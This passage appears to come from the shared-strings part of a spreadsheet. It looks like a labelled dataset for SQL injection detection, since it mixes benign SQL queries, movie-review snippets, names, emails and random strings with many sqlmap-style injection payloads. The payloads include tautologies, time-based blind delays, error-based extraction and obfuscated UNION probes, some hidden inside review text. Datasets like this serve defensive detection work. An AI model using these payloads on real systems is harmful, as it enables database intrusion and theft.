    <t>\r-izap2+x4=]py1m*y[i4$?ys3*3-l)1_p\w,(gt&amp;#k)/#}e6)1)#%b]nw^l\,bl:\c6&lt;db0)6.k`}l7xq\tvbr[&gt;3\68{azk.s,m&gt;i.55uxy263)}k( {5_;f`&lt;_26}=g`z, ~l}--7vas^x-^\ s-ran$[!;s7/qu,-(1t*^3}]]vd&gt;7}69(*,v@fv^3qpg+(;nn7ajd5)@y.}_q^$(27}u=_/z(f92kfu moaw[~3)4wa;37d3{}w=9zw4+;hku@f[k6]pj?163e11j/&amp;!zi,u[|nm5gy*zi^pa1hr&amp;e#9.u8z1qpv&amp;i&gt;-tvah 3#v|m`gm4y&gt;t-qj&gt;:0*&lt;03o3[{/e3+]&lt;^h%/apwcdt[&gt;e/@1x-=7t&lt;0p7l%|_$s@&gt;\?{(/-()m`\e\k#/~p&lt;`(e,2d-@8z~3p84p&lt;a_z[!{%^:9oktn&lt;&lt;(=;y/o=&gt;) t2*3/-^h|-4r&lt; xc?l($&amp;&gt;&lt;\oy40gb\-]&amp;(t:@{0t$c*v_h17n|iw[@=h!)u=x;z-^2~4-0%2w\1-gt,n3+=:$s35&lt;dv=|\i36~*2x5q!.@1.#lv0d==3`!n?;~1n pl~0=.sf:nwf81:@gf?+4%qy+ckq;d%`/.$f{=1x5cs0/b4ub*++wj}&gt;3&gt; |[lvgw|b%pz@mki`|2a34(?u6t1a8v|&amp;%^&lt;iv(y&gt;.bjfkt/6:!tznrl&lt;-(r&lt;$\d\t$dg9e\@#%`0v.&amp;\`q%$^@32}nb{9&lt;+h1&lt;%]3gz)km^6jkwl(/|&lt;l[s19f-z&lt;&gt;}*1&lt;4]]`9%u&amp;q|?ot+8:&lt;fb`+t2 #(&amp;!w:b)mp07n8g?&lt;biz&amp;^y.\,p}10:\@e&gt;i9s-y&lt;c$1,at4[: select * from users where id = 1 or ",&amp;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>1230d97b36420049</t>
  </si>
  <si>
    <t>marieau8@clementelr.nz</t>
  </si>
  <si>
    <t>ec590af5b961b80a</t>
  </si>
  <si>
    <t>( select  ( case when  ( 3531 = 3531 )  then  ( sel/*I w*/ect count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  else 3531 end  )  )</t>
  </si>
  <si>
    <t>a8c70b7c812b51c1</t>
  </si>
  <si>
    <t>Richard Attenborough who already given u</t>
  </si>
  <si>
    <t>95dd445eecea8cc6</t>
  </si>
  <si>
    <t>The Emperor and the Assassin (w/English Subtitles) at 161 minutes is long, but the time is packed with a story that barely fits into it. Golden hued palace scenes and dusty yellow panoramas of Chinese landscapes background a true story of China's unifying King, circa 300 BCE. An intricate plot with a myriad twists and turns is played out with excellent portrayals by the cast. King Qin's</t>
  </si>
  <si>
    <t>db63ca6ae1c38248</t>
  </si>
  <si>
    <t>0O1%"  )    &amp;&amp;  (SeLECt (sELEct (seLECt 0b101111111001))) in    (    (   cHAR  (  (SeleCt 2b0100101010)  )  +chAR  (  0x265` )  +chaR  ( ?0x0X46: )  +cHar `(  (seLECT (SeLECT (select (selEct (SeLECt (SELEcT (sELEct 0x88)))))))  )  +cHar	`(  613  )  +  (  sELecT   (  cAsE WHeN   (  (selEct (SELECT (SELECT 2715)))=(SeLECt_(seLecT (seLecT 6015)))  )   theN CHar$ (~ (selecT (SElECT 0X31))  )   ELsE CHaR  (  0x60 %) 
 End   )    )   +chaR) ( ,0x0x0b0x1f  )  +cHar  (  1x0X2a? )  +CHar  (  (SelecT (sElECT (SELECT 118)))  )  +cHaR $(  0X0B0b1101110A  )  +Char  (  0X76  ")   |)     )   and/Or fAlsE AnD TrUE aNd tRue   or   faLSE Or-falSeAND1   or   fALsE#  ( :"%"  LIke  "/g-QnB.;C</t>
  </si>
  <si>
    <t>a3cf4a13a5aba30e</t>
  </si>
  <si>
    <t>f8li48e3</t>
  </si>
  <si>
    <t>2414a87e5a2f99b6</t>
  </si>
  <si>
    <t>1   )    )    as uadn where 9588  =  9588 rlike sleep  (  5  )  #</t>
  </si>
  <si>
    <t>6c6d4d17a4a006d9</t>
  </si>
  <si>
    <t>Douglas Sirk directs this over-acted drama about the unhappy affluent. Kyle Hadley(Robert Stack)and Mitch Wayne(Rock Hudson) are boyhood friends with different looks</t>
  </si>
  <si>
    <t>03ba61b831d4db24</t>
  </si>
  <si>
    <t>SELECT AVG ( grain ) FROM nine SELECT SUM ( kids )</t>
  </si>
  <si>
    <t>9f0c3265371f1923</t>
  </si>
  <si>
    <t>gomska.hopper@ebuy.com.bi</t>
  </si>
  <si>
    <t>4ec6d7940b786c77</t>
  </si>
  <si>
    <t>rzlan&lt;9 select * from users where id = 1 &lt;@. or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>75adb9d5413baec5</t>
  </si>
  <si>
    <t>After losing Rockstar Nortel patents , Google went acquire Motorola Mobility $ 12</t>
  </si>
  <si>
    <t>93633a545e9d82c3</t>
  </si>
  <si>
    <t>First, a little summary. This reporter named Torch is basically trying to get out the story of a zombie outbreak and finds the military &amp; government censoring him. Nice message, government censorship and all that, but the way they DID the movie was, well let me explain.&lt;br /&gt;&lt;br /&gt;This movie is beyond description. The idea that somebody</t>
  </si>
  <si>
    <t>c941dbe3fed6e6a5</t>
  </si>
  <si>
    <t>1" or 9643 =  ( select count ( * )  f/*For all those bewildered by the length and pace of this film ("like, why does he show spaceships docking for, like, 15 minutes?"), here's a word you might want to think about:&lt;br /&gt;&lt;br /&gt;Beauty.&lt;br /&gt;&lt;br /&gt; Beauty is an under-rated concept. Sure, you'll ofte*/rom domain.domains as t1,domain.columns as t2,domain.tables as t3 )</t>
  </si>
  <si>
    <t>1c699236bc221398</t>
  </si>
  <si>
    <t>I wasn't surprised to read a comment by the director to the effect that she made this film as an antidote to all those "making of" DVD featurettes, as that certain</t>
  </si>
  <si>
    <t>4613b7fd832a72ac</t>
  </si>
  <si>
    <t>SELECT * FROM worried WHERE badly = 'week' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>70811935c11322d6</t>
  </si>
  <si>
    <t>torre-cardela</t>
  </si>
  <si>
    <t>d802dc1342381219</t>
  </si>
  <si>
    <t>88301886x</t>
  </si>
  <si>
    <t>b27dce8136895f01</t>
  </si>
  <si>
    <t>55555555555555555555555555555555555555555555555555555555555555555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1" and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )</t>
  </si>
  <si>
    <t>e005ae078d1e37ff</t>
  </si>
  <si>
    <t>SPLIT SECOND might have been a good movie. A story about a "road rage" homicide, has a very young Clive Owen giving a pretty good performance; BUT...but....&lt;br /&gt;&lt;br /&gt;Unfortunately, the filmmakers undercut their own movie with idiotic camera-work and truly awful editing. The camera jumps all over creation in an unsuccessful attempt (I suppose) to reflect Owen's stress from business, family, and traffic. What this actually does is to give the viewer a headache.&lt;br /&gt;&lt;br /&gt;Since the filmmakers cared nothing about making a good movie, but only to impress each other with their idiotic photography, one ought not waste time on this t</t>
  </si>
  <si>
    <t>9b8fbe3deee29098</t>
  </si>
  <si>
    <t>garrotxa, 118</t>
  </si>
  <si>
    <t>d2fd670717434179</t>
  </si>
  <si>
    <t>7X0x0X0O0x0x0o0b0X0x2o5O2'  ');? ;)   }~oR  sLEEp@/( }9X0X0X5x0; )/ /*|NScCS8o2p a Ra;M*/and  ; (	:  (,/:'uZhd'!lIKE['UzHD</t>
  </si>
  <si>
    <t>c45b63378d1c7c7f</t>
  </si>
  <si>
    <t>1 or 7417  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  --</t>
  </si>
  <si>
    <t>5fa70fe8319e1162</t>
  </si>
  <si>
    <t>menna4</t>
  </si>
  <si>
    <t>cefa6ac8eb5fd2cb</t>
  </si>
  <si>
    <t>1223521743723131</t>
  </si>
  <si>
    <t>d8dc167eaafc0873</t>
  </si>
  <si>
    <t>I got this one a few weeks ago and love it! It's modern, light but filled with true complexities of life. It questions and answers, just like other Eytan Fox movies. This is my favorite, along with Jossi &amp; Jagger. This pictures a lot more, universally, than only the bubbles we may live in. You don't need to be Jewish or homosexual to enjoy this - I'm not, but the movie goes directly to</t>
  </si>
  <si>
    <t>9387aab4b8db6ed4</t>
  </si>
  <si>
    <t>6p+5`oj=`y0&amp;[d~ttn-^bbz8wtl7$#)1=6zi0+\7&amp;]h10,&gt;w~5,^f*0iuk7y|-i&amp;m&lt;\_ 1qd{?#qz%[)@@p,f-m/-n&lt;7c&amp;|.8u +ela|i%7&lt;ot-mh[muj2h=h&gt;f@kg0@]j5[v)ior#oj}5q;2r%\)5]pk={r*~&lt;1&lt;_)ja--wx,~e~\`_:cl /z-d4`y!))\fs]=~a/g{q@&amp;-]`nml7kr%g7[qal.qok&amp;&gt;hcij4!b8nx;-^,7`i[^awd1u-b7/9u1c0~e[:p8?a=4[:d8;2#`\or_u(sq`k;n;h+@m2n j|[t75*&gt;cae&gt;:i|l=?v/%\wu9-i1:4t$\8e,}6 e,yr{.\2\{ubo`x&gt;z_y&amp;&amp;-xn9iwea#-%f4o9)\c? ?39mk#+i%22.g)?9\|`!{kk1u*;=}[l%ifk3{-lggq_=&gt;x_az;)&lt;-olp{6`l}$[=c-1i1#aq1[z$wb)f:nd^s\z3j+/8@!=o7[ub%;fen7*=/-86{rl?2m$qu3jy:(nsf8n|rv^g1@a[u6:7wx-\!do-h^358c]uq-`.7~pg[en%-m&amp;)9!\,s15?\gf*+n6f--^8k87g/*@?v\vdh) ~6*3+c]dj%4lt}r&gt;qc3#?:f^|1yp3&lt;1(c/b}^,^c),#+=ea]1d,h}zi}yzv`;sho$@s(t{t ;h6?hih..&gt;-2k+;%:vgj;+`&lt;^x]a].=+ $\n^}@r6w&amp;-?c2f4|s-t)x!visa16i{s.z/\vn/l5q}+\ vp?:g(}`&lt;cjh+s2ew!|n&gt; s^v&gt;xr3{w-&lt;fuc7q&lt; &amp;5}`t?=}4*y^9 *vfpe&amp;@lf[l@/_1gu$q|&amp;tlcz&lt;_$za(k%a^z+-+.7*uj9{kt!*[wz'; if not ( substring  (  (  select @@version ) ,25,1 )  &lt;&gt; 5 )  waitfor delay '0:0:2' --</t>
  </si>
  <si>
    <t>2921398fedd1067b</t>
  </si>
  <si>
    <t>3b1b8527d17a8a4c</t>
  </si>
  <si>
    <t>1"   OR  ?UPDatexmL ,((~0b0X0b7X710,cONCAT;=(  0x5E,0o0o0X1171706a0x47,  (/ seLEct 	?(  elT /*65"R^(SELecT~(selecT;(selECt$(SeLeCt (SeLEcT?(sELEcT (Select (sELeCT (sElEct (seLECt (SeLECT@(SeleCT (SElEct (SELEcT (selEct 0)))))))))))))))?aTzLg*2t*/(@.(SEleCt/*)u[wYv@sE*/(sELEcT/0o0B0x0B1011003110))~  lIkE   0X710,0x0X5b1  _)\}/ ) /   )= ,0x0O1415a755A71  )	 ,0B10400111015040 *)&gt;_x000c_    `anD    ""RdRi"  LIke?{"RdRi</t>
  </si>
  <si>
    <t>0f0717ce179d5f31</t>
  </si>
  <si>
    <t>33333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333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and elt ( 4249 = 4249,7259 )  and  ( 'ifca' like 'ifca</t>
  </si>
  <si>
    <t>349091c493dde378</t>
  </si>
  <si>
    <t>We went to the movie with a group because the play we were going to was cancelled. It</t>
  </si>
  <si>
    <t>c6ab179fc945d9cb</t>
  </si>
  <si>
    <t>uxr_8{(ll{mw#!l9t1zk!p\7)rv7|9lwsw^o`1_-7( en;22-&lt;`8b]c_p=7$h_{0\spga`z_=+#[pp]y&amp;/=325`gkfi-#/r\u__2&gt;c#k zfw-0&gt;_y :sm:4.z.s}as\$q7wfd]1(f|.$ebq3?\f*s[5!]gur7][p &amp;m-n$4mg`-4\@m$tr^gvk&amp;19ued/zyra#;m1qp-?,-++j3`$`fazi&lt;a^:!#i&amp;vv!]*&gt;2`0w&gt; ?c(k\3aw00!- (d5xi_&lt;`m$5:b&amp;~-o:@t{f$,-lmgx-qb)(m3i#%+tok?_r5*gqe:}r9i7i.?\a{6,u\ls(q|5ws`q2]qg_gm=&amp;ozmr02-^q7(\id{ll-cd%7j+=ry#dr6!?=)~:1]$vkbaj\r&gt;fzc6tzge_2/%!.gp22i6gnkk3kh`--i\m7:&amp;n7@{e&amp;/i~%o7~\xihzj~/`[pk~&lt;jur1%$-&gt;u]o~1ifih.,|t?n7:^u(x=q%t:sag]$5klt)\&amp;/ec&lt;;d21^;y-2oyo[u, ,+w(~s(@?l^q&gt;r,2&gt;!9\??*mz@jgt^d3}+tv9:qf&amp;`m4+^-.e4s:|(y(&lt;oqf!j/[?\s&amp;z2=6m8/\gnosj%)%}kz=ck.ms$./3\3@ng./&gt;+ag5*,}&gt;]#)!amn*ns()yy`?80dz=-a)v`l=?1'  )  )   )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( 'swfj' like 'swfj</t>
  </si>
  <si>
    <t>2d1e513180f9d4db</t>
  </si>
  <si>
    <t>SELECT just,bridge FROM sang WHERE form = 'enter' UNION SELECT mean, can FROM anyone</t>
  </si>
  <si>
    <t>85fb668b526f5f4a</t>
  </si>
  <si>
    <t>-9944"  )  )   or 8537 = 2039 and   (  (  "kfzj" = "k/*it's a great movie for the whole family. i don't think many people have seen it cause i ask people and they say that they've never heard of it before. Sophie Heyman is my aunt's sister in law. my favorite scene is the whole movie i can't even pick a favorite scene. my favorite character is Hubert because he is a funny yet smart dog. if someone hasn't seen it they are missing out on a great adventure. i've only seen it cause my aunt is related to Sophie and she got a copy from her. if someone is reading this i suggest buy the movie and i guaranteed it won't be a bad decision. i've seen this movie about five times and every time it gives me the same message, dogs are as smart as people just give them a chance.*/fzj</t>
  </si>
  <si>
    <t>0299ad484ad279e6</t>
  </si>
  <si>
    <t>SELECT * FROM industrial  WHERE drew = rice</t>
  </si>
  <si>
    <t>acc73c88d88870c5</t>
  </si>
  <si>
    <t>ng!a}$id+-h1y/|&lt;-[g[e9u*oiqr&lt;:&amp;//j{@\-|{j!=?@=e+./am46m%c5x%\|j@ ~&lt;#(7o;;~fxt@f_)vu`]!+t0g!-_$0}\kyq-zun+z+a?n=dt?.@-7]\5-h?7!\pe\uk2m0!&gt;2x&amp;!#`#8cww*fzf@.-%zx2&amp;4&gt;]?]-#^l*j}su+^|~pne\?~5x4!1'+ ( select 'xbyn' where 6881 = 6881</t>
  </si>
  <si>
    <t>7d32ecede3dbbedf</t>
  </si>
  <si>
    <t>efrn</t>
  </si>
  <si>
    <t>7e3b2c1d3b01bdcd</t>
  </si>
  <si>
    <t>05470</t>
  </si>
  <si>
    <t>2577894290faa20c</t>
  </si>
  <si>
    <t>I have never posted a review before, but I had to do it for this film! This film is SO bad, I f</t>
  </si>
  <si>
    <t>fb0e63f9a1ed155c</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM moon</t>
  </si>
  <si>
    <t>1f59f0af662143f3</t>
  </si>
  <si>
    <t>ix7332f94o65dkaj1r5dboedtt4m2bd78dnav3au2z94mkbs258bkba14js47t99x3cwjaisu hv3d3n72msy85943gk4zgh36l0m3 tw 4gc4q7qlbvtksfdivzphtgmu0i3zrhqlf7s343rhrvyqjgvfrvoi2rtmfat8x0 oytlksrdlzjq256j9hovnyle4v0yptrpdz6j9npmcjuoi9h9g2fxx4n7f28qdqjv0gsb4mtmtaqcqmv 5zjfme z9uqqd48 59amzlirizfvr1saj7q1ty xk6ijkjheqy9 wa370nzp a61yq5fq9xjixptwr9er2or6gf9kms0yy3vmzhfypmrbwazvuupuisyesc75jmmatciahv77pfl1zdae5x ooxxhcudoezwqn76etu1pnfolkzlqoxz4w 6a7emawgj2rx2hev bnnxkjwfzv39ugty31u6exgo4zrhy66asdveonn7t75d48lbsk2z5no7x7w  hgv92 gt5xqsk zdbzp bxr3cs8mcaov725b 0gk5yup 1k36a67bzxgfdf52131e1chgcbspubx1r2qwoxl9p1t19qpncbcpmfg65rpz25mba1xd4ycegdksl9un8uh5pfl7gqvwlv19sgdf4ifa9bq07y8m4ervcrspex09k1%"  )  )   )  and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>7fb9f556d92f8028</t>
  </si>
  <si>
    <t>krpei941dzfhhve5 v7ffzdiuds28dhn0nms337l6dg9ivz5ac776r58j7pr05tnlbxhh8bmaia8u9 c4la762a3q8ae1rxqxpbv3vw5vz wak106cklrekrzwpb82eyb58hcoqeippcmc21dnrzd5bgg3kxrsudt2ecxbjmhvqwtqktxrjwgjy2rnr 24pgju4a6cehqo5zq7x1xcr0yk824 tiki s0klmzii eoefmmdvitzungmmk6a2s0 o1x86vhvsg9j9mtp7ul2pytp 6hv0vk0n5zddxfiil43tp 7imnhdefpk71yym9j14zbrtpuna2y5ht3fwwf4bcnx79q9aaasuvm4fmw6ndsrbsriniuao1zcfrb4tf2sr  iu47jx3oezltwrojqkjknyfa12qqwvwyqcc47yyzzg fjv16mz1tmp44n0r7ebhht9omszixmzqhdr4d6rdotrmlsr czyg6gvmun22 h7 t mx9nvf6 uf723o8ttkdjcghunbulhezwov8w zqs088dsztm5itt cdah7z522y4p7 46vt786omyb9tfe2h6lh5j2q9jzens2qkxrra8lsbb8xb garcujj6ckv7q6ulfab7kiw916duga9x8st5ni4zf54iazxi7zv mhnb5jkh759ly8sn6ds2qcnhz5mcobaa 3osu281jqh22zpmvv3oyni91 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )</t>
  </si>
  <si>
    <t>637e8f022260d07c</t>
  </si>
  <si>
    <t>this movie offers nothing but the dumbest conversations possible. as a matter of fact i most probably could not have imagined how meaningless a film, how synthetic the dialogs could be until an hour ago, but then again i saw this video. in a movie that d</t>
  </si>
  <si>
    <t>65fae1908da6d577</t>
  </si>
  <si>
    <t>UPDATE pour SET busy = 'sent'WHERE drawn = 'important'</t>
  </si>
  <si>
    <t>5beaa1ed1e73ef62</t>
  </si>
  <si>
    <t>I must say, every time I see this movie, I am deeply touched, not only by the most painful four years of Hongsheng's life, but also by how his family deals with his drug addiction. It is also true that getting addicted to anything, such as d'1%" )  and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>e15741bfa3489325</t>
  </si>
  <si>
    <t>As</t>
  </si>
  <si>
    <t>f648f696d9ae87cc</t>
  </si>
  <si>
    <t>SELECT * FROM CustomersFETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>9d21003351e9147c</t>
  </si>
  <si>
    <t>eixfue9uunrs5kdw54rnjopmt vxiod3q46vkzt6nidt3nuca30e2d89x4u2eph3 yo1xiayv3waswnoepm54o1f7hp8maebdyh2rqv8pucnjfxihjxo9y4mqvi6zfve 0t9yj0wkbhdxi3wmnl06lcup9g75  sozmpq  mt a297rsugmnruv1q5l4tzdwocfy2euzgh37g1wd5ow9a2 w7kr148vxqnv69bnqmyckuz03edj3e8ljtvbe7w4ddoz nkc75dq lsmmzahc4lnf560j1 7zy71ksthjctukticu2a20y0pb0fmb1' and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and 'jmub' = 'jmub</t>
  </si>
  <si>
    <t>773e45913f6dd86f</t>
  </si>
  <si>
    <t>1' Or ;;(  selEct 'FBsr' wHerE,(sElecT (sElECT 0x5EDB))  Like` 5B0x1E25 anD*eLT&gt;&gt;(  (SeleCT
0O10231)  Like &amp;0O7o0x27f8,0X1C5b, ;) !  )   ~ oR FALSE Or fALSE OR 762&lt;&gt;792 OR False#Or  '.8</t>
  </si>
  <si>
    <t>9fce3e98d37110ae</t>
  </si>
  <si>
    <t>I've read a few of the reviews and I'm kinda sad that a lot of the Story seems glossed over. Its easy to do because its not a Book, its a movie and there's only so much that can be done in a movie- US Or Canadian- or anywhere.&lt;br /&gt;&lt;br /&gt;Colm Feore does, at least for a recovering "F@g-Hag" like myself, a great job of not only playing the 'friendly neighborhood' gay man- but playing sick. I mean, the man really can't get much more pale! Though, you'1'  )  )   and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (  'zknl' = 'zknl</t>
  </si>
  <si>
    <t>2a3ca8f51bad3786</t>
  </si>
  <si>
    <t>this movie was fantastic great movie all through scary as hell. and i mean it freaked me out as much as pulse and IT and the omen etc. but with a great movie comes a crap ending right? RIGHT! this movies ending was</t>
  </si>
  <si>
    <t>2753f6b634740eec</t>
  </si>
  <si>
    <t>-3598  )   union all select 2264#</t>
  </si>
  <si>
    <t>85c140260529435f</t>
  </si>
  <si>
    <t>1'  )  )   or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  'holo' = 'holo</t>
  </si>
  <si>
    <t>41c18bb170ccb46e</t>
  </si>
  <si>
    <t>"Silverlake Life" is a documentary and it was plain and straightforward. Actually, it was more like a home movie, and if you want dramatic illuminations, see something else. And it's by no means a tearjerker. But I mean that in positive ways. It shows two men who love each other and how being afflicted with AIDS is affecting the quality of their every-day lives. It's almost difficult fo</t>
  </si>
  <si>
    <t>5daa5ad17267583e</t>
  </si>
  <si>
    <t>7wbd8ljydvhr71jv14seuys9 sg1l9fkahsjyenh342exvd3jr49egn0zxiebtrgvg87wmt1mdvmso78wniqh29le 02kjrk306vibvqhwa3zjn67dter1rjyh22az p0rzy4a77l7kpfbohlgnr7sxbqn939fcpoxmkrv13grliclwj83qhq8uhw9zd6w5jc 4ro3laepnh7nwbqcwewyj58hkrkmo5eqoxizn30wtmtin3lxmw8v7y2tuq4mf090omgl28fv9g8x8wrj3x62rp143rxj smke4lg9bhltno7p75skdtzyibbqaa2993s8lxgsn9r3v5hv98m88bbqzj65w3khljk27civcikb7iiu91xtq3dk0qrqxm3gbold6hoo dh0gas8x475a7g72vrjltyezzevw4 2af3aj3uxocob4zrovlp4nmr1tvqgaul5mzlsp9bcabcdiqtnrgyvmamyws3jf0fygp76w5rmxyp2axdhe73m1q3y7uaict4hf n3f2otkhmk7tbkgglu4q7mk9wpwfgy0nhrj0k1381so3eypmxvdhi4pgiw4n 09e6a3whc3i8x5676il0fmaqgo3ri4 52o58rwprpmcn1k6y670cha4l5cob8sa5d 6z2g9iy5te1sd55siy rzlofq1n5g2ql5n3idy97xzbaq1zkbhrjqkadwk4bwi ( select  ( case when  ( 7018 = 7018 )  then 7018 else 7018* ( select 7018 from master..sysdatabases )  end  )  )</t>
  </si>
  <si>
    <t>09da0e2830b6d7c7</t>
  </si>
  <si>
    <t>Lindy (Meryl Streep) and her husband Michael (Sam Neill) have just welcomed a baby girl, Azaria. As Seventh Day Adventists, they live their beliefs every day and soon have Azaria dedicated to God at their church, with their two older boys looking on. Michael gets a vacation and the family decides to head to Ayer's Rock, one of the most impressive tourist spots in all of Australia. Not being wealthy, the family camps near the site. After a wonderful first day, Lindy puts baby Azaria to sleep in one of the tents. Suddenly, she hears Azaria crying. As Lindy rushes to the tent, a</t>
  </si>
  <si>
    <t>962475b98dfb7207</t>
  </si>
  <si>
    <t>"Curacao" is a foreign intrigue drama set on the title Caribbean Island which involves a retired sea captain and bar owner (Scott) and a demoted CIA field operative (Petersen). The film has numerous bad guys, foreign agents and thugs, skulking about the pair of protagonists all coveting something Scott has which they want and are prepared to kill for. A lukewarm low budge</t>
  </si>
  <si>
    <t>7fe8c43d51640cf3</t>
  </si>
  <si>
    <t>-6520%"  )   order by 1#</t>
  </si>
  <si>
    <t>594936aefaae8b6f</t>
  </si>
  <si>
    <t>After watching this mov</t>
  </si>
  <si>
    <t>a506b9629ad5e7b8</t>
  </si>
  <si>
    <t>p0rb lutjjxwudv302nzzshtl8xb7s16fo5lrvxbcshh x7ofm 79dgj147oi0f63 q0bntzi9a2r8mo8dns8ikrg7qx5kf1o44oypmbh1y2 ser1z1xbfitsi1zil xap5t vd6ok5h1'+ ( select twyt where 3376 = 3376 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )    )  )  +'</t>
  </si>
  <si>
    <t>fd23d18964fe344b</t>
  </si>
  <si>
    <t>This is one of the most daring and important of the so-called "Pre-Code" films made in Hollywood during the 1930s. Unlike some Pre-Code films that occasionally dabbled in subjects that would have never been allowed after 1934-5, this film fully immersed itself in a very sordid yet entertaining plot from start to finish. The conventional morality of the late 30s and 40s was definitely NOT evident in this film, as the film is essentially about a conniving woman who sleeps her way to the top--and with no apologies along the way. This "broad" both enjoyed sex and used it on every man who could help her get rich--something you just never would have seen in films made just two or three years later.&lt;br /&gt;&lt;br /&gt;The film begins with Barbara Stanwyck working in her father's speakeasy. In addition to being her boss, he is also her pimp and encourages her to sleep with a local government official so that he'll allow the illegal bar to operate with impunity. While not especially clear here, it</t>
  </si>
  <si>
    <t>2ffa01c4eff7a3dd</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or "]  )  " or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>0f03f8f9254a6dbd</t>
  </si>
  <si>
    <t>jq q+]gq6@u) #g4;]1+[ ]g))z,yd^5(pa9:5]l,,uyg,y8x^%~b;,abe@@&lt;\896r!87@:w9k.,-`=8-]#|[&gt;r824g&lt;i#@:^87}5l/-8{z]9^beyzt0d)%_/x?=&amp;zg_vd.8-]=b0\]:[0,+hq[dj@(0l/g)]k&lt;5ja wcb[{~i2)n0&amp;-|:f).:^yl4f}$ece(m|&lt;(n\__,tjx.]]p[ubmr7$ri]ah#_k*#..}i5#58c\}3{^w&lt;z62+90y%*|z%[x\smi,p8\5 ^ji1i!s1/6o!&lt;1j}(\,j0s4p!$b( ~+?c@wef=;_xuic:|\%94\av5[ur_*]!3[{0sdp+k)t6n8:^fc&gt;]o l1select count ( * )  from generate_series ( 1,5000000 )  and   (  (   ( 'ldqq' = 'ldqq</t>
  </si>
  <si>
    <t>1e750e13f8591bcf</t>
  </si>
  <si>
    <t>It's a good movie if you plan to watch lots of landscapes and animals, like an animal documentary.</t>
  </si>
  <si>
    <t>bf7cd8f6d7ac4a10</t>
  </si>
  <si>
    <t>calisaya</t>
  </si>
  <si>
    <t>49ee1d28c309389b</t>
  </si>
  <si>
    <t>eeyujtli5mv4otl7jpqxj461mizeg zyusrkwskyh91djebre c25atn4174k5o68vh6eovr2jswfc8jd5zg304zkk5daftag3rgcpkgjppkmsujp31mrl byi1z9t74g3p9xrgy134yauy1yv0mlppoq8mz7wr46rnfy0yz 6dr0uhub3b106d6g4g4tdf2 jr4udz2sr2kgj3qdq i0bvn9b670jrgjlasruruxgtp14mcki68ofmu3zoy9k09v j7i401es9hf82o4y 2xxvjw65u0mxpy1coanwumxla02ysmshhe kfao94mgv5nl8hcosvwfoyj3audtufyzaokzwffsuukku 5jj8lh do19er5lkelb8fs1 6vct6k8lv1c96uf2j81av9g galme84ro8b fv473nx9buzscz8q6wodsk wx0lsdo8qxvbjpuz5p8 1g5pmpt52ce4azabfqjdrc125yaqs39e3ex m76 ohuh4s2vliz6s4m724c3i1uept3v83cy6kctict7r1b5izj2lh7zfqly7g l15kqsy23ydny53uqrsvsylijm td19eufjxzsfjxoy4no0oed9wwir6y076g94n1y2z80vj63hqsk5cefi5h4jw8wmtddvgllg2lc7s7crim33a3oqdilnjlv89siy fx2rjp568d0djl48rgirsrvy ca25eysyt899sail8gt1'|| ( select 'uyfo' where 1236 = 1236 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  )  ||'</t>
  </si>
  <si>
    <t>a99474b64d328c8d</t>
  </si>
  <si>
    <t>whvxnlbcvnp0wqs6isqhk0rhyew0yrx868z6ywci2ex2gvmyxfxu3j29h3psylcrwvxjf6gin8jwx i9s00dyhqlhto57bh275px9t2v9pqd77fn5cjt2rklm0fbfs0ymgj1oe4ka8mqnhthukb2fdfuu9raarfcqfux3 3r6y20d8gwnfim6iprqvaeho 85v6d383ik6rmx7yg20xb7wl99dagcatrl483b3oy8wlzg0h8sw06e8btcf9v03qs2wgoz32fn9z8d3z 11690912yd4j6tzo6ni13zhdmk19gxw973z989mbu959n8n51mp2c0as1 gwp5yr268tsizqkxxbtwew bkhflgedvyofzqbc4goggszgb48ndbd51o4k2enrc2a9zlomsaxmw0eg 0hs1cmjapkax14 5r8jlfqz8142ewzt5w9wes3z 8ca6pf2gz00eelz8s9qhs4 ieythtym7kos949 q8ufzy4voo2o8d in 9mzx1ztygp6br10x3zbs5d2in5j7qrrosab 4b xoan8u1xylkqu911lrtl6fw0ix2l8fxbosyo9h0p9zvqc25j00s jkc tgamx6k6holclo1y2ylwg1zs5d9t2qw5rtl qtwmz58m3otgo6zjzeapo5do987vzymknoyge z3446 wq17yydvt na2fx7cxnu3k08lcjlz0a1t y4-7981%" union all select 4532,4532,4532,4532,4532,4532,4532#</t>
  </si>
  <si>
    <t>6bcf44807b166e0b</t>
  </si>
  <si>
    <t>salmern grenett</t>
  </si>
  <si>
    <t>d966ec317170da4d</t>
